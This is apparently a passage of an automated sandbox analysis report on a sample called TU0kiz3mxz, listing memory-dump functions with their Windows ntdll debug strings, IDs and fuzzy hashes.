                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      • Opcode ID: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                                                                                      • Instruction ID: 6e127fdb177a1f582d6d2d2b23d2fe43980669737708a549d70b95a3496ffef8
                                                                                                                      • Opcode Fuzzy Hash: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                                                                                      • Instruction Fuzzy Hash: A5310536B40325B7EB259A998C42F6A7B68EBA5A90F05405DFB44AB244D370DE01C6E1
                                                                                                                      Function 010FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                                                                                                      • LdrpInitializeProcess, xrefs: 010FC6C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      • Opcode ID: 7ac334a3633745f681f9cbc17d2b6e88de1737d393b81f7bde9421177248ef45
                                                                                                                      • Instruction ID: 02472dba63e018ba4b8d85e01c9022a1059ab4364075cd3145f0935ca88a5f24
                                                                                                                      • Opcode Fuzzy Hash: 7ac334a3633745f681f9cbc17d2b6e88de1737d393b81f7bde9421177248ef45
                                                                                                                      • Instruction Fuzzy Hash: 3A3125717483069FD228EF29D986E5AB7D4EFD4B14F04056CF9C56B291D720EC04C7A2
                                                                                                                      Function 0110096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1404860816-0
                                                                                                                      • Opcode ID: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                                                                                      • Instruction ID: 851b17f4cb71c027e1d195b89e615a79eba8706e372ee2490eea5fb9035ca3b7
                                                                                                                      • Opcode Fuzzy Hash: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                                                                                      • Instruction Fuzzy Hash: FA427071900715DFDB29CF28C840BAAB7F4FF48314F1445A9E989EB285E7B0A985CF61
                                                                                                                      Function 00407B1B Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: C$a$b$d$i
                                                                                                                      • API String ID: 0-2334916691
                                                                                                                      • Opcode ID: c6eeb8cbc03640a193bfc6d0d3d9de1308857fb69640405d2970f7d05852a2de
                                                                                                                      • Instruction ID: d22940d51a10411b06836f79c6bd71cc5d1668cdd9c9a6b15b5d7c4882908401
                                                                                                                      • Opcode Fuzzy Hash: c6eeb8cbc03640a193bfc6d0d3d9de1308857fb69640405d2970f7d05852a2de
                                                                                                                      • Instruction Fuzzy Hash: 1C319EB1E04208AAEB14DFA1EC85FEEB7B8EF45308F00451EE518A7241E77965418BA9
                                                                                                                      Function 010CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      • Opcode ID: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                                                                                      • Instruction ID: 37d5dce524c0e2fba15246abd82e495db571a7721696b9ee90bbe3c3332ece33
                                                                                                                      • Opcode Fuzzy Hash: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                                                                                      • Instruction Fuzzy Hash: 6CC1577460838ACBD715DF58C044B6EB7E4BB98B04F04896EF9D68B251E734CA49CF52
                                                                                                                      Function 010F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 010F8591
                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                                                                                      • LdrpInitializeProcess, xrefs: 010F8422
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1918872054
                                                                                                                      • Opcode ID: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                                                                                      • Instruction ID: 5dfabe56bfb77d231692168b9260ba66100c9d621794ed4900cd4113a8538ae2
                                                                                                                      • Opcode Fuzzy Hash: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                                                                                      • Instruction Fuzzy Hash: 7A91BD71608345AFDB26EF25CC45EABBAE8BF84B44F40492EFAC496140E774D904CB62
                                                                                                                      Function 010F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                                                                                      • .Local, xrefs: 010F28D8
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      • Opcode ID: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                                                                                      • Instruction ID: 74f3399708ea131046782e5ef1d07d06cadb9c6ad6c5824e7fb6c4f4ce7bdcf8
                                                                                                                      • Opcode Fuzzy Hash: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                                                                                      • Instruction Fuzzy Hash: E1A1D13190522ADBDB24DF68CC85BA9B3B0BF98354F1541EDDA88AB651D730DE80CF90
                                                                                                                      Function 010F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                                                                                                      • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                      • API String ID: 0-1245972979
                                                                                                                      • Opcode ID: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                                                                                                      • Instruction ID: 7c9476fa8fae1320ed408e567c3881944bc983d8145b604acdfa1b89965f5fbd
                                                                                                                      • Opcode Fuzzy Hash: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                                                                                                      • Instruction Fuzzy Hash: 4D6111326107069BD72ACF1CC882B2AB7E0BF80B60F15856DEEA5DB645D730E801CBD5
                                                                                                                      Function 010C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                      • API String ID: 0-1468400865
                                                                                                                      • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                                                                                      • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                                                                                                      • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                                                                                      • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                                                                                                      Function 010F4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                                                                                                      • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                      • API String ID: 0-3779518884
                                                                                                                      • Opcode ID: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                                                                                      • Instruction ID: eb2de068767d90bd52a923a3454bcee08583103061ea069206cc4e17b795195d
                                                                                                                      • Opcode Fuzzy Hash: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                                                                                      • Instruction Fuzzy Hash: 75312C329006119EEF3ABB0CC88BB6776E4BB01654F0A81ADDFD4D7AD1D7A09CC08795
                                                                                                                      Function 010E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                                                                                      • LdrpDynamicShimModule, xrefs: 0112A998
                                                                                                                      • apphelp.dll, xrefs: 010E2462
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-176724104
                                                                                                                      • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                                                                                      • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                                                                                                      • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                                                                                      • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                                                                                                      Function 010D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                                                                                      • HEAP: , xrefs: 010D3264
                                                                                                                      • HEAP[%wZ]: , xrefs: 010D3255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                                                                                      • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                                                                                                      • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                                                                                      • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                                                                                                      Function 010D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                                                                                      • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                                                                                                      • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                                                                                      • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                                                                                                      Function 010E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 2994545307-1077428164
                                                                                                                      • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                                                                                      • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                                                                                                      • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                                                                                      • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                                                                                                      Function 010BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                                                                                      • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
                                                                                                                      • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                                                                                      • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                                                                                                      Function 010E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                                                                                      • LdrpCheckModule, xrefs: 0112A117
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-161242083
                                                                                                                      • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                                                                                      • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                                                                                                      • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                                                                                      • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                                                                                                      Function 010D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-1334570610
                                                                                                                      • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                                                                                      • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                                                                                                      • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                                                                                      • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                                                                                                      Function 010FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                                                                                      • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                                                                                                      • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                                                                                      • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                                                                                                      Function 0117C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0117C1F1
                                                                                                                      • PreferredUILanguages, xrefs: 0117C212
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                                                                                      • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                                                                                                      • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                                                                                      • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                                                                                                      Function 01154144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      • Opcode ID: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                                                                                      • Instruction ID: 35d0219708588b32bea3c68e3fdda6c9c2a8e877761f23db1ce044e0647c9bd9
                                                                                                                      • Opcode Fuzzy Hash: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                                                                                      • Instruction Fuzzy Hash: 56412272A00368CBEB2ADBD9D844BADBBB4FF55380F140059DD61EBB81E7349981CB11
                                                                                                                      Function 01144755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                                                                                      • LdrpCheckRedirection, xrefs: 0114488F
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      • Opcode ID: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                                                                                      • Instruction ID: 906cdcc8ceb0423c0ada20adad46296675d75bd555b8591246a1126a6d581c54
                                                                                                                      • Opcode Fuzzy Hash: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                                                                                      • Instruction Fuzzy Hash: 1B41E432A00A529FDB29CF9CD840B267BE4FF49E50B06016DED94E7B11E330D801CB81
                                                                                                                      Function 010D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
